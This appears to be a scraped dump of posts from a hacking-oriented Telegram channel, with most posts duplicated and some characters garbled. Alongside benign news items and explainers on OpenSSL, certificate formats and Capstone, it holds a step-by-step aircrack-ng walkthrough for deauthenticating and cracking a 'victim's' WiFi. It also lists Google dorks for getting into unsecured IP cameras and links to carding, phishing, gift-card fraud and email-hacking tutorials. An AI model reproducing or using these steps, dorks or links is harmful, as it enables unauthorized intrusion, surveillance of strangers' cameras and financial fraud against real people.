β β β Uππ»βΊπ«6π¬πβ β β β
π¦Google was sued by the Arizona Attorney General for alleged fraud
#News
> According to foreign media reports, on Wednesday , local time, Google was sued by Arizona Attorney General Mark Brnovich, who accused the search giant of deceiving users and collecting location data from their mobile phones. We know that the vast majority of Googleβs revenue comes from its huge advertising business, and the personal information that Google collects when users use its products provides support for it.
> In this regard, Brnovich posted on Twitter that the user was deceived by a false sense of security because Google made the user think that they disabled the location data collection settings, but in fact these settings are still turned on. The lawsuit requires Google to provide damages, but the exact amount is unclear. Brnovich's office also did not respond to requests for comment.
>Google has defended its policy on location data in a statement. Spokesperson Jose Castaneda said: "The Attorney General and the lawyers who charge for litigation seem to have wrongly described our services. We have always built privacy features into our products and provided strong control over location data. We look forward to clarifying the facts. "
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Google was sued by the Arizona Attorney General for alleged fraud
#News
> According to foreign media reports, on Wednesday , local time, Google was sued by Arizona Attorney General Mark Brnovich, who accused the search giant of deceiving users and collecting location data from their mobile phones. We know that the vast majority of Googleβs revenue comes from its huge advertising business, and the personal information that Google collects when users use its products provides support for it.
> In this regard, Brnovich posted on Twitter that the user was deceived by a false sense of security because Google made the user think that they disabled the location data collection settings, but in fact these settings are still turned on. The lawsuit requires Google to provide damages, but the exact amount is unclear. Brnovich's office also did not respond to requests for comment.
>Google has defended its policy on location data in a statement. Spokesperson Jose Castaneda said: "The Attorney General and the lawyers who charge for litigation seem to have wrongly described our services. We have always built privacy features into our products and provided strong control over location data. We look forward to clarifying the facts. "
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Forwarded from Backup Legal Mega
π¦Hacking & Carding Spanish
https://mega.nz/folder/x3Y3hILb#uIIyryhrMF5bUEGQKc9IqA
π¦Udemy The Complete Ethical Hacking Course (6.8 GB).zip
https://mega.nz/file/5qZTlIDJ#dp1V3WtylISzMECwnaZNrqdmRoKzj4Dul0CzLbBvoaY
https://mega.nz/folder/x3Y3hILb#uIIyryhrMF5bUEGQKc9IqA
π¦Udemy The Complete Ethical Hacking Course (6.8 GB).zip
https://mega.nz/file/5qZTlIDJ#dp1V3WtylISzMECwnaZNrqdmRoKzj4Dul0CzLbBvoaY
mega.nz
1.21 GB folder on MEGA
22 files
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is OpenSSL and what is it used for ?
OpenSSL is a cryptographic toolkit that implements the Secure Sockets Layer (SSL v2 / v3) and Transport Layer Security (TLS v1) network protocols and their corresponding cryptography standards.
The openssl program is a command-line tool for using various cryptographic functions of the OpenSSL cryptographic library in the console. Main features:
1) Create and manage private keys, public keys and parameters.
2) Public Key Cryptographic Operations
3) Create X.509, CSR, and CRL certificates
4) Message Digest Calculation
5) Encryption and decryption using ciphers
6) Client / Server SSL / TLS Tests
7) S / MIME signed or encrypted mail processing
8) Time stamp requests, generation and validation
share usβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦What is OpenSSL and what is it used for ?
OpenSSL is a cryptographic toolkit that implements the Secure Sockets Layer (SSL v2 / v3) and Transport Layer Security (TLS v1) network protocols and their corresponding cryptography standards.
The openssl program is a command-line tool for using various cryptographic functions of the OpenSSL cryptographic library in the console. Main features:
1) Create and manage private keys, public keys and parameters.
2) Public Key Cryptographic Operations
3) Create X.509, CSR, and CRL certificates
4) Message Digest Calculation
5) Encryption and decryption using ciphers
6) Client / Server SSL / TLS Tests
7) S / MIME signed or encrypted mail processing
8) Time stamp requests, generation and validation
share usβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦TERMUX-LINUX 2020
#prohack
Capstone is a disassembly framework with the target of becoming the ultimate disasm engine for binary analysis and reversing in the security community.
π¦FEATURES :
Support multiple hardware architectures: ARM, ARM64 (ARMv8), Ethereum VM, M68K, Mips, MOS65XX, PPC, Sparc, SystemZ, TMS320C64X, M680X, XCore and X86 (including X86_64).
Having clean/simple/lightweight/intuitive architecture-neutral API.
Provide details on disassembled instruction (called βdecomposerβ by others).
Provide semantics of the disassembled instruction, such as list of implicit registers read & written.
Implemented in pure C language, with lightweight bindings for D, Clojure, F#, Common Lisp, Visual Basic, PHP, PowerShell, Emacs, Haskell, Perl, Python, Ruby, C#, NodeJS, Java, GO, C++, OCaml, Lua, Rust, Delphi, Free Pascal & Vala (ready either in main code, or provided externally by the community).
Native support for all popular platforms: Windows, Mac OSX, iOS, Android, Linux, *BSD, Solaris, etc.
Thread-safe by design.
Special support for embedding into firmware or OS kernel.
High performance & suitable for malware analysis (capable of handling various X86 malware tricks).
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
(1) Compile from source
On *nix (such as MacOSX, Linux, *BSD, Solaris):
- To compile for current platform, run:
$ ./make.sh
- On 64-bit OS, run the command below to cross-compile Capstone for 32-bit binary:
$ ./make.sh nix32
(2) Install Capstone on *nix
To install Capstone, run:
$ sudo ./make.sh install
For FreeBSD/OpenBSD, where sudo is unavailable, run:
$ su; ./make.sh install
Users are then required to enter root password to copy Capstone into machine
system directories.
Afterwards, run ./tests/test* to see the tests disassembling sample code.
NOTE: The core framework installed by "./make.sh install" consist of
following files:
/usr/include/capstone/arm.h
/usr/include/capstone/arm64.h
/usr/include/capstone/capstone.h
/usr/include/capstone/evm.h
/usr/include/capstone/m680x.h
/usr/include/capstone/m68k.h
/usr/include/capstone/mips.h
/usr/include/capstone/mos65xx.h
/usr/include/capstone/platform.h
/usr/include/capstone/ppc.h
/usr/include/capstone/sparc.h
/usr/include/capstone/systemz.h
/usr/include/capstone/tms320c64x.h
/usr/include/capstone/x86.h
/usr/include/capstone/xcore.h
/usr/lib/libcapstone.a
/usr/lib/libcapstone.so (for Linux/*nix), or /usr/lib/libcapstone.dylib (OSX)
(3) Cross-compile for Windows from *nix
To cross-compile for Windows, Linux & gcc-mingw-w64-i686 (and also gcc-mingw-w64-x86-64
for 64-bit binaries) are required.
- To cross-compile Windows 32-bit binary, simply run:
$ ./make.sh cross-win32
- To cross-compile Windows 64-bit binary, run:
$ ./make.sh cross-win64
Resulted files libcapstone.dll, libcapstone.dll.a & tests/test*.exe can then
be used on Windows machine.
(4) Cross-compile for iOS from Mac OSX.
To cross-compile for iOS (iPhone/iPad/iPod), Mac OSX with XCode installed is required.
- To cross-compile for ArmV7 (iPod 4, iPad 1/2/3, iPhone4, iPhone4S), run:
$ ./make.sh ios_armv7
- To cross-compile for ArmV7s (iPad 4, iPhone 5C, iPad mini), run:
$ ./make.sh ios_armv7s
- To cross-compile for Arm64 (iPhone 5S, iPad mini Retina, iPad Air), run:
$ ./make.sh ios_arm64
- To cross-compile for all iDevices (armv7 + armv7s + arm64), run:
$ ./make.sh ios
Resulted files libcapstone.dylib, libcapstone.a & tests/test* can then
be used on iOS devices.
(5) Cross-compile for Android
To cross-compile for Android (smartphone/tablet), Android NDK is required.
NOTE: Only ARM and ARM64 are currently supported.
$ NDK=/android/android-ndk-r10e ./make.sh cross-android arm
or
$ NDK=/android/android-ndk-r10e ./make.sh cross-android arm64
Resulted files libcapstone.so, libcapstone.a & tests/test* can then
be used on Android devices.
(6) Compile on Windows with Cygwin
π¦TERMUX-LINUX 2020
#prohack
Capstone is a disassembly framework with the target of becoming the ultimate disasm engine for binary analysis and reversing in the security community.
π¦FEATURES :
Support multiple hardware architectures: ARM, ARM64 (ARMv8), Ethereum VM, M68K, Mips, MOS65XX, PPC, Sparc, SystemZ, TMS320C64X, M680X, XCore and X86 (including X86_64).
Having clean/simple/lightweight/intuitive architecture-neutral API.
Provide details on disassembled instruction (called βdecomposerβ by others).
Provide semantics of the disassembled instruction, such as list of implicit registers read & written.
Implemented in pure C language, with lightweight bindings for D, Clojure, F#, Common Lisp, Visual Basic, PHP, PowerShell, Emacs, Haskell, Perl, Python, Ruby, C#, NodeJS, Java, GO, C++, OCaml, Lua, Rust, Delphi, Free Pascal & Vala (ready either in main code, or provided externally by the community).
Native support for all popular platforms: Windows, Mac OSX, iOS, Android, Linux, *BSD, Solaris, etc.
Thread-safe by design.
Special support for embedding into firmware or OS kernel.
High performance & suitable for malware analysis (capable of handling various X86 malware tricks).
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
(1) Compile from source
On *nix (such as MacOSX, Linux, *BSD, Solaris):
- To compile for current platform, run:
$ ./make.sh
- On 64-bit OS, run the command below to cross-compile Capstone for 32-bit binary:
$ ./make.sh nix32
(2) Install Capstone on *nix
To install Capstone, run:
$ sudo ./make.sh install
For FreeBSD/OpenBSD, where sudo is unavailable, run:
$ su; ./make.sh install
Users are then required to enter root password to copy Capstone into machine
system directories.
Afterwards, run ./tests/test* to see the tests disassembling sample code.
NOTE: The core framework installed by "./make.sh install" consist of
following files:
/usr/include/capstone/arm.h
/usr/include/capstone/arm64.h
/usr/include/capstone/capstone.h
/usr/include/capstone/evm.h
/usr/include/capstone/m680x.h
/usr/include/capstone/m68k.h
/usr/include/capstone/mips.h
/usr/include/capstone/mos65xx.h
/usr/include/capstone/platform.h
/usr/include/capstone/ppc.h
/usr/include/capstone/sparc.h
/usr/include/capstone/systemz.h
/usr/include/capstone/tms320c64x.h
/usr/include/capstone/x86.h
/usr/include/capstone/xcore.h
/usr/lib/libcapstone.a
/usr/lib/libcapstone.so (for Linux/*nix), or /usr/lib/libcapstone.dylib (OSX)
(3) Cross-compile for Windows from *nix
To cross-compile for Windows, Linux & gcc-mingw-w64-i686 (and also gcc-mingw-w64-x86-64
for 64-bit binaries) are required.
- To cross-compile Windows 32-bit binary, simply run:
$ ./make.sh cross-win32
- To cross-compile Windows 64-bit binary, run:
$ ./make.sh cross-win64
Resulted files libcapstone.dll, libcapstone.dll.a & tests/test*.exe can then
be used on Windows machine.
(4) Cross-compile for iOS from Mac OSX.
To cross-compile for iOS (iPhone/iPad/iPod), Mac OSX with XCode installed is required.
- To cross-compile for ArmV7 (iPod 4, iPad 1/2/3, iPhone4, iPhone4S), run:
$ ./make.sh ios_armv7
- To cross-compile for ArmV7s (iPad 4, iPhone 5C, iPad mini), run:
$ ./make.sh ios_armv7s
- To cross-compile for Arm64 (iPhone 5S, iPad mini Retina, iPad Air), run:
$ ./make.sh ios_arm64
- To cross-compile for all iDevices (armv7 + armv7s + arm64), run:
$ ./make.sh ios
Resulted files libcapstone.dylib, libcapstone.a & tests/test* can then
be used on iOS devices.
(5) Cross-compile for Android
To cross-compile for Android (smartphone/tablet), Android NDK is required.
NOTE: Only ARM and ARM64 are currently supported.
$ NDK=/android/android-ndk-r10e ./make.sh cross-android arm
or
$ NDK=/android/android-ndk-r10e ./make.sh cross-android arm64
Resulted files libcapstone.so, libcapstone.a & tests/test* can then
be used on Android devices.
(6) Compile on Windows with Cygwin
To compile under Cygwin gcc-mingw-w64-i686 or x86_64-w64-mingw32 run:
- To compile Windows 32-bit binary under Cygwin, run:
$ ./make.sh cygwin-mingw32
- To compile Windows 64-bit binary under Cygwin, run:
$ ./make.sh cygwin-mingw64
Resulted files libcapstone.dll, libcapstone.dll.a & tests/test*.exe can then
be used on Windows machine.
(7) By default, "cc" (default C compiler on the system) is used as compiler.
- To use "clang" compiler instead, run the command below:
$ ./make.sh clang
- To use "gcc" compiler instead, run:
$ ./make.sh gcc
(8) To uninstall Capstone, run the command below:
$ sudo ./make.sh uninstall
(9) Language bindings
So far, Python, Ocaml & Java are supported by bindings in the main code.
Look for the bindings under directory bindings/, and refer to README file
of corresponding languages.
Community also provide bindings for C#, Go, Ruby, NodeJS, C++ & Vala. Links to
these can be found at address http://capstone-engine.org/download.html
Enjoyβ€οΈππ»
β 2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
- To compile Windows 32-bit binary under Cygwin, run:
$ ./make.sh cygwin-mingw32
- To compile Windows 64-bit binary under Cygwin, run:
$ ./make.sh cygwin-mingw64
Resulted files libcapstone.dll, libcapstone.dll.a & tests/test*.exe can then
be used on Windows machine.
(7) By default, "cc" (default C compiler on the system) is used as compiler.
- To use "clang" compiler instead, run the command below:
$ ./make.sh clang
- To use "gcc" compiler instead, run:
$ ./make.sh gcc
(8) To uninstall Capstone, run the command below:
$ sudo ./make.sh uninstall
(9) Language bindings
So far, Python, Ocaml & Java are supported by bindings in the main code.
Look for the bindings under directory bindings/, and refer to README file
of corresponding languages.
Community also provide bindings for C#, Go, Ruby, NodeJS, C++ & Vala. Links to
these can be found at address http://capstone-engine.org/download.html
Enjoyβ€οΈππ»
β 2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
www.capstone-engine.org
Download
The Ultimate Disassembler
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Enjoy friends Most Wanted Tutorials :
βGet a FREE Mastercard
βGet refunded for your giftcards
βGet Things from Ebay for Free by Bull-D
βGetting Referrals
βGoogle SEO Secret Guide
βGuide to making money online
βGuide_-_The_Ultimate_Blackhat_Cash_Machine
βHack Hotmail
βHacking Gmail Guide
βHma CPALEAD Guide
βHman_CPASecrets#1
βHow To Crack WEP In Linux
βHow to Get Massive YouTube Traffic
βHow To Get Passes To Pornsites
βHow To Hack WEP wifi Passwords
βHow To Make Mozilla Firefox 30 Times Faster
βHow To Kick Someone Of A Wireless Network (Must be LAN-Admin)
βHow to Make $1000's a Week with Torrents & CPA-PPL
βHow To Make A Phisher For A Website
βHow to make easy money as an eBay affiliate - Victor V
https://mega.nz/file/tqAWmSKK#sMdx61OVHGAug3__p_LBomRXmjISQ1d915nCt6E8Zag
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Enjoy friends Most Wanted Tutorials :
βGet a FREE Mastercard
βGet refunded for your giftcards
βGet Things from Ebay for Free by Bull-D
βGetting Referrals
βGoogle SEO Secret Guide
βGuide to making money online
βGuide_-_The_Ultimate_Blackhat_Cash_Machine
βHack Hotmail
βHacking Gmail Guide
βHma CPALEAD Guide
βHman_CPASecrets#1
βHow To Crack WEP In Linux
βHow to Get Massive YouTube Traffic
βHow To Get Passes To Pornsites
βHow To Hack WEP wifi Passwords
βHow To Make Mozilla Firefox 30 Times Faster
βHow To Kick Someone Of A Wireless Network (Must be LAN-Admin)
βHow to Make $1000's a Week with Torrents & CPA-PPL
βHow To Make A Phisher For A Website
βHow to make easy money as an eBay affiliate - Victor V
https://mega.nz/file/tqAWmSKK#sMdx61OVHGAug3__p_LBomRXmjISQ1d915nCt6E8Zag
β β β Uππ»βΊπ«6π¬πβ β β β
mega.nz
File on MEGA
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Turn Android Device into a Web Server
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£Install & open termux
2οΈβ£$ pkg install git
3οΈβ£$ pkg install golang
4οΈβ£$ export GOPATH=/data/data/com.termux/files/home/go
5οΈβ£$ go get -u -v github.com/kataras/iris
6οΈβ£$ cd /data/data/com.termux/files/home/go/src/github.com/kataras/iris/_examples/hello-world
7οΈβ£$ go run main.go
8οΈβ£ Open your favorite browser and navigate to http://localhost:8080
Enjoyβ€οΈππ»
β 2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Turn Android Device into a Web Server
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£Install & open termux
2οΈβ£$ pkg install git
3οΈβ£$ pkg install golang
4οΈβ£$ export GOPATH=/data/data/com.termux/files/home/go
5οΈβ£$ go get -u -v github.com/kataras/iris
6οΈβ£$ cd /data/data/com.termux/files/home/go/src/github.com/kataras/iris/_examples/hello-world
7οΈβ£$ go run main.go
8οΈβ£ Open your favorite browser and navigate to http://localhost:8080
Enjoyβ€οΈππ»
β 2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - kataras/iris: The fastest HTTP/2 Go Web Framework. New, modern and easy to learn. Fast development with Code you control.β¦
The fastest HTTP/2 Go Web Framework. New, modern and easy to learn. Fast development with Code you control. Unbeatable cost-performance ratio :rocket: - kataras/iris
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some Termux Useful commands :
pip install youtube-dl For installing Youtube-dl
Packages install python Installs Python
termux-setup-storage Gives TERMUX access to your file system
mkdir βdir-name For creating directory
cd βdir-nameβ For changing directory
cat βfile-nameβ For reading any file
mv /path/file /path where file is moved For moving files from one path to another.
cp /path/file /path where to copy file For copying files from one path
to other
rm filename.file-extension For removing mentioned file from a certain directory.
ping βwebsite URLβ Helps verify IP level connectivity
toilet -f mono12 -F gay βyour textβ Presents text in a specified format.
apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.
apt show (app-name) Installs the desired app
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some Termux Useful commands :
pip install youtube-dl For installing Youtube-dl
Packages install python Installs Python
termux-setup-storage Gives TERMUX access to your file system
mkdir βdir-name For creating directory
cd βdir-nameβ For changing directory
cat βfile-nameβ For reading any file
mv /path/file /path where file is moved For moving files from one path to another.
cp /path/file /path where to copy file For copying files from one path
to other
rm filename.file-extension For removing mentioned file from a certain directory.
ping βwebsite URLβ Helps verify IP level connectivity
toilet -f mono12 -F gay βyour textβ Presents text in a specified format.
apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.
apt show (app-name) Installs the desired app
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦How To Hack Wifi Using Termux ?
First connect your wife-adapter to your device :
1οΈβ£Friends first open Your Gnu Root Debian terminal or root terminal and start the monitor mode by typing these commands :
airmon-ng
airmon-ng start wlan0
2οΈβ£ Now start the network detecting by typing this command :
airodump-ng wlan0mon
Here you see your target device and stop the detecting by control + z.
3οΈβ£ Now create one folder and name it cap on your desktop or sd card and also create a password list to brute force the WiFi handshake ,collect the information about victim and create the password list for brute force.
4οΈβ£Copy victimβs BSSID and also note the target channel CH number and type this command :
airodump-ng -c 6 --bssid00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon-w
5οΈβ£There you must give the cap folder path if your created this cap folder on sdcard then you can give this path : -w /sdcard/cap/ wlan0mon
6οΈβ£Now open another terminal and disconnect all devices with this command and capture a wifi handshake type same command but use here target bssid :
aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon
now stop attack by control+z and close the terminal
7οΈβ£now paste the password list in your cap folder and also go into the cap folder directory
Now crack with this command :
aircrack-ng -w pass.list 01.cap
8οΈβ£ this is a brute force attack if any password match to the handshake then it will be cracked.and you get the key (means passwords)
π¦Tested On:
> root android
> version 6.0
Enjoy β€οΈππ»
powered by Wiki :)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦How To Hack Wifi Using Termux ?
First connect your wife-adapter to your device :
1οΈβ£Friends first open Your Gnu Root Debian terminal or root terminal and start the monitor mode by typing these commands :
airmon-ng
airmon-ng start wlan0
2οΈβ£ Now start the network detecting by typing this command :
airodump-ng wlan0mon
Here you see your target device and stop the detecting by control + z.
3οΈβ£ Now create one folder and name it cap on your desktop or sd card and also create a password list to brute force the WiFi handshake ,collect the information about victim and create the password list for brute force.
4οΈβ£Copy victimβs BSSID and also note the target channel CH number and type this command :
airodump-ng -c 6 --bssid00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon-w
5οΈβ£There you must give the cap folder path if your created this cap folder on sdcard then you can give this path : -w /sdcard/cap/ wlan0mon
6οΈβ£Now open another terminal and disconnect all devices with this command and capture a wifi handshake type same command but use here target bssid :
aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon
now stop attack by control+z and close the terminal
7οΈβ£now paste the password list in your cap folder and also go into the cap folder directory
Now crack with this command :
aircrack-ng -w pass.list 01.cap
8οΈβ£ this is a brute force attack if any password match to the handshake then it will be cracked.and you get the key (means passwords)
π¦Tested On:
> root android
> version 6.0
Enjoy β€οΈππ»
powered by Wiki :)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Netcat_vs_Cryptcat_β_Remote_Shell_to_Control_Kali_Linux_from_Windows.pdf
2.2 MB
Netcat vs Cryptcat β Remote Shell to Control Kali Linux from Windows machine
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Key and Certificate Formats :
> Private keys and certificates can be stored in various formats, which means that you often have to convert them from one format to another. The most common formats are:
1) Binary (DER) certificate
Contains an X.509 certificate in raw form using DER ASN.1 encoding.
2) ASCII (PEM) certificate (s)
Contains a base64 encoded DER certificate in which ----- BEGIN CERTIFICATE ----- is used as the header, and ----- END CERTIFICATE ----- is used as the footer. Usually found with only one certificate per file, although some programs allow more than one certificate depending on the context. For example, older versions of the Apache web server require that the server certificate be one in one file, and all intermediate certificates in another.
3) Binary (DER) key
Contains the private key in raw form using DER ASN.1 encoding. OpenSSL creates keys in its own traditional (SSLeay) format. There is also an alternative format called PKCS # 8 (defined in RFC 5208), but it is not used widely. OpenSSL can convert to and from PKCS # 8 format using the pkcs8 command .
4) ASCII (PEM) key
Contains a base64 encoded DER key , sometimes with additional metadata (for example, the algorithm used for password protection).
5) PKCS # 7 Certificate
A complex format for transporting signed or encrypted data, defined in RFC 2315. It is usually found with the extensions .p7b and .p7c and can optionally include the entire certificate chain. This format is supported by the keytool Java utility.
6) PKCS # 12 (PFX) key and certificate (s)
A complex format that can store and protect the server key along with the entire certificate chain. Commonly encountered with extensions .p12 and .pfx . This format is commonly used in Microsoft products, but is also used for client certificates. Nowadays, the name PFX is used as a synonym for PKCS # 12, although in the old days, PFX meant a different format (earlier version of PKCS # 12). It is unlikely that you will meet the old version anywhere.
share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Key and Certificate Formats :
> Private keys and certificates can be stored in various formats, which means that you often have to convert them from one format to another. The most common formats are:
1) Binary (DER) certificate
Contains an X.509 certificate in raw form using DER ASN.1 encoding.
2) ASCII (PEM) certificate (s)
Contains a base64 encoded DER certificate in which ----- BEGIN CERTIFICATE ----- is used as the header, and ----- END CERTIFICATE ----- is used as the footer. Usually found with only one certificate per file, although some programs allow more than one certificate depending on the context. For example, older versions of the Apache web server require that the server certificate be one in one file, and all intermediate certificates in another.
3) Binary (DER) key
Contains the private key in raw form using DER ASN.1 encoding. OpenSSL creates keys in its own traditional (SSLeay) format. There is also an alternative format called PKCS # 8 (defined in RFC 5208), but it is not used widely. OpenSSL can convert to and from PKCS # 8 format using the pkcs8 command .
4) ASCII (PEM) key
Contains a base64 encoded DER key , sometimes with additional metadata (for example, the algorithm used for password protection).
5) PKCS # 7 Certificate
A complex format for transporting signed or encrypted data, defined in RFC 2315. It is usually found with the extensions .p7b and .p7c and can optionally include the entire certificate chain. This format is supported by the keytool Java utility.
6) PKCS # 12 (PFX) key and certificate (s)
A complex format that can store and protect the server key along with the entire certificate chain. Commonly encountered with extensions .p12 and .pfx . This format is commonly used in Microsoft products, but is also used for client certificates. Nowadays, the name PFX is used as a synonym for PKCS # 12, although in the old days, PFX meant a different format (earlier version of PKCS # 12). It is unlikely that you will meet the old version anywhere.
share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦TikTok European user privacy protection work will be handed over to Ireland and UK branches on July 29 :
#News
( if you a hater for tiktok call this tracking ennemiesπΊ & and if you love tiktok call this a simple news)
> According to a news release issued by ByteDance on Monday, the responsibility for providing privacy protection for European TikTok users will be transferred to branches in Ireland and the United Kingdom. After the adjustment, the service provider of users in the EEA-Swiss region will be changed to TikTok Ireland, and the same adjustment will be made in the UK region.
>In a statement released today, TikTokβs director of trust and security in Europe, the Middle East, and Africa, Cormac Keenan, and Madeline Moncrieff, director of corporate affairs for EMEA, said the adjustment will take effect on July 29.
π¦In the statement:
> Since the introduction of TikTok to Europe, we have invested in local talent, created a regional senior leadership team, and established the necessary business functions in the region, because we believe this is the best to support our growing TikTok community here the way.
> From July 29, TikTok's Irish and British branches will succeed our US TikTok Inc, provide TikTok to European users, and manage and protect their personal data.
>TikTok has more than 1,000 employees in Europe, of which 800 employees work in the United Kingdom and Ireland. London remains the companyβs main office and its second largest office, and the Trust and Security Center in Dublin is led by Mr. Keenan. In January this year, the company said it would establish a new European base in Dublin, employing 100 employees.
>In the statement: βAs we expand throughout the region, TikTok Ireland has been responsible for maintaining the privacy and security of users in Europe. Our Trust and Security Center in Dublin allows us to focus on strengthening policies, technologies and control strategies, To ensure the safety of our community, our new data privacy team will focus on maintaining the highest standards of data protection. This work is overseen by the Office of the Data Protection Officer to promote accountability and encourage privacy awareness and a culture of compliance."
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦TikTok European user privacy protection work will be handed over to Ireland and UK branches on July 29 :
#News
( if you a hater for tiktok call this tracking ennemiesπΊ & and if you love tiktok call this a simple news)
> According to a news release issued by ByteDance on Monday, the responsibility for providing privacy protection for European TikTok users will be transferred to branches in Ireland and the United Kingdom. After the adjustment, the service provider of users in the EEA-Swiss region will be changed to TikTok Ireland, and the same adjustment will be made in the UK region.
>In a statement released today, TikTokβs director of trust and security in Europe, the Middle East, and Africa, Cormac Keenan, and Madeline Moncrieff, director of corporate affairs for EMEA, said the adjustment will take effect on July 29.
π¦In the statement:
> Since the introduction of TikTok to Europe, we have invested in local talent, created a regional senior leadership team, and established the necessary business functions in the region, because we believe this is the best to support our growing TikTok community here the way.
> From July 29, TikTok's Irish and British branches will succeed our US TikTok Inc, provide TikTok to European users, and manage and protect their personal data.
>TikTok has more than 1,000 employees in Europe, of which 800 employees work in the United Kingdom and Ireland. London remains the companyβs main office and its second largest office, and the Trust and Security Center in Dublin is led by Mr. Keenan. In January this year, the company said it would establish a new European base in Dublin, employing 100 employees.
>In the statement: βAs we expand throughout the region, TikTok Ireland has been responsible for maintaining the privacy and security of users in Europe. Our Trust and Security Center in Dublin allows us to focus on strengthening policies, technologies and control strategies, To ensure the safety of our community, our new data privacy team will focus on maintaining the highest standards of data protection. This work is overseen by the Office of the Data Protection Officer to promote accountability and encourage privacy awareness and a culture of compliance."
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Vulnerability Scanners
#FastTips :
> Vulnerability scanners automate security auditing and can play a vital part in your IT security by scanning your network and websites for different security risks. These scanners are also capable of generating a prioritized list of those you should patch, and they also describe the vulnerabilities and provide steps on how to remediate them. It is also possible for some to even automate the patching process.
> One of the best lists of popular vulnerability scanners is maintained by OWASP at:
https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Vulnerability Scanners
#FastTips :
> Vulnerability scanners automate security auditing and can play a vital part in your IT security by scanning your network and websites for different security risks. These scanners are also capable of generating a prioritized list of those you should patch, and they also describe the vulnerabilities and provide steps on how to remediate them. It is also possible for some to even automate the patching process.
> One of the best lists of popular vulnerability scanners is maintained by OWASP at:
https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
owasp.org
Vulnerability Scanning Tools | OWASP Foundation
Vulnerability Scanning Tools on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.
β β β Uππ»βΊπ«6π¬πβ β β β
π¦maybee you have Toolx THE GREAT TOOL
Still need more ?
#tool
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
$ apt update
$ apt upgrade
$ apt install git
$ git clone https://github.com/Ranginang67/DarkFly-Tool
$ cd DarkFly-Tool
$ chmod +x
$ sh install
Run :
$ DarkFly
enjoyβ€οΈππ»
β β β Uππ»βΊπ«6π¬πβ β β β
π¦maybee you have Toolx THE GREAT TOOL
Still need more ?
#tool
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
$ apt update
$ apt upgrade
$ apt install git
$ git clone https://github.com/Ranginang67/DarkFly-Tool
$ cd DarkFly-Tool
$ chmod +x
$ sh install
Run :
$ DarkFly
enjoyβ€οΈππ»
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - Ranginang67/DarkFly-Tool: DarkFly tool V.4.0
DarkFly tool V.4.0. Contribute to Ranginang67/DarkFly-Tool development by creating an account on GitHub.
IP Cams from around the world.pdf
299.3 KB
IP Cams from around the world
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Gain access to unsecured IP cameras with these Google dorks.
β 2020 git source
inurl:/view.shtml
intitle:βLive View / - AXISβ | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
